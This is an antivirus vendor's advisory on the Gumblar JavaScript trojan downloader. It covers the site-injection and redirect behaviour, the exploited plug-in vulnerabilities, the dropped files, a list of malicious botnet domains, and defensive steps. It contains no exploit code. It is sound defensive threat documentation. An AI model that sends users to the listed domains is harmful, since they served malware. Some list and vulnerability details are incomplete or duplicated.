JS/Gumblar.A!tr.dldr

Alias/es

JS/Redir.MR!tr, Trojan-Downloader.JS.Gumblar.a (Kaspersky), Obfuscated Script.f.gen trojan (McAfee), JS/Redir.M (FProt)

Release Date

Jun 03, 2009

Detection Availability

Current Antivirus Definition Database Version: 12.338

Description

Visible Symptoms

The browser is redirected to malicious websites.
Malicious files may be downloaded.

Detailed Analysis

This detection is for an obfuscated script that is injected to compromise websites via cross-site scripting. The malicious URL is encoded in the script.

With more than 3,500 instances of website infections caused by the 'Gumblar' trojan in Japan as of this writing, enterprises need to guard their administrative passwords more closely, as the attack indicates that the respective web server security may have been compromised. Administrative password theft can happen either remotely or locally.

Hackers may sniffer search for passwords with a bot application or access the server locally. In either case, once the administrative rights has been compromised illegitimately, the hacker can strike anytime regardless of the locale.

When internet users visit infected websites, the injected script redirects the web browser to the malicious website that is hosting other malicious downloabable components such as PDF and SWF files. These files contain exploits which eventually download a malicious Win32 executable.

The behavior of this trojan is very similar to JS/Redir.MR!tr.

Technical Details

The malware basically redirects infected host sites to another infected web site which most commonly contains an infected PDF or any malicious binary.

As of this writing, the following web sites have been extracted from the malware code which would have indicated to serve as part of the botnet used by Gumblar:
- gmj100.com
- jkbioindia.com
- liverpoolgoldenestates.co.uk
- martuz.cn
- skream.jp
- srpskidespot.org.rs
- jthinc.net
- eco-pro.org
- cima-afrique.org
- cuthouse.net
- e-walker.com
- 01024239114.kt.io
- clashforum.com
- snapemotorcompany.org.uk
- hydreka.fr
- victoryskitchen.com
- yourdesignservices.com
- sites-counter.com
- reme.uji.es
- oerotrading.com
- articles.koraja.com
- stats.analytics.info
- kingofbelgrade.com
- usepetrol2ea.com
- lakyrnikcup.cz
- transmarecuador.com
- balasmeer.com
- paketik.by
- curbmaker.biz
- parnu.aakv.ee
- foro.gamesquality.com
- greenvibs.com
- krasota.dietologam.ru
- articles.koraja.com
- wolfaartsen.com
- music-x.nkk.lt
- kfea.kr
- schitkomplekt.ru
- pamaku-auspuff-zentrum.de
- global-paratransit.com
- stockbuzzindia.com
- fitdurchphysio.de
- china.schreiber-hp.de
- 0314918631.kt.io
- wholemanministries.net
- rts-me.com
- typicaldesign.net
- tssauto.ru
- jgreenjewelers.net
- indiatouragency.com
- vasaikar.org
- rosentadesign.se
- download.ir
- impressionbt.com
- lauwaert.net
- reme.uji.es
- tentimes10.com
- akiciplastik.com

Most of the recovered files are found to be infected by various means including via injected codes in the HTML, JS, and PHP scripts. Victims expose themselves by downloading free JS scripts from the Internet and these scripts act to control the victim's PC by exploiting popular vulnerabilities in the browser and plug-ins, such as Adobe Reader and Adobe Flash Player. These vulnerabilities include the following:
For vulnerability CVE-2007-0071, Gumblar uses a similar runtime packer discussed in the FortiGuard Centre blog entry titled "Flash Mob Episode II: Attack of the Clones".

The malicious script varies in functionality. Some would solely create a link that would redirect to infected sites; some may apply changes on the infected hosts. The following have been observed in some variants of the Gamblar script:
- Drop a copy of itself on the StartUp folder in the Start Menu
- Drop a copy of itself on the Program Files folder, where the most common filename being used is Uninstall.exe
- Drop a copy of itself on the current user's Home Folders
- Register the malicious PDF/Shockwave file

Action

Enterprises can protect their networks by practicing general password theft prevention protocols as listed below:
- Do not save your passwords in plain text.
- Avoid using communication protocol that uses plain text like FTP. Instead, use FTPS, FTPES or SFTP.
- Use updated antivirus programs.
- Apply the latest patches for all software, especially browsers and plug-ins.
- Always logout from the server after you are done working on it - do not ever leave your server physically while you are logged on.
- Ensure that the network area has perimeter protection.
- Do not give your password to untrusted websites or personnel.

Fortinet customers can protect their networks from these Gumblar attacks by doing the following:
- Submit any suspicious file or website to FortiGuard Centre for further analysis.
- Stay updated as we have created virus and IPS detections intended to catch known Gumblar related infections. In addition, we have also created a specific IPS signature ("Gumblar.Botnet") to block communications between infected PC and command-and-control (C&C) server and also added Web Filtering blocking against access to infected domains (hosting malicious files sites).
- Ensure that you have deployed FortiGate appliances for network security and FortiClient software for desktop clients and server.
- Since this attack exploits several known vulnerabilities in the browser and plug-ins, make sure that all installed software is patched with the latest updates.
- Last but not least, if you ever suspect that you are infected, change all your passwords and apply all available patch protection immediately.

FortiGate Systems

Check the main screen using the web interface for your FortiGate unit to ensure that the latest AV/NIDS database has been downloaded and installed on your system - if required, enable the "Allow Push Update" option.

FortiClient Systems
Quarantine/delete files that are detected and replace infected files with clean backup copies.

Description Last Updated Date: Jan 13, 2010
Reference: ID - 864887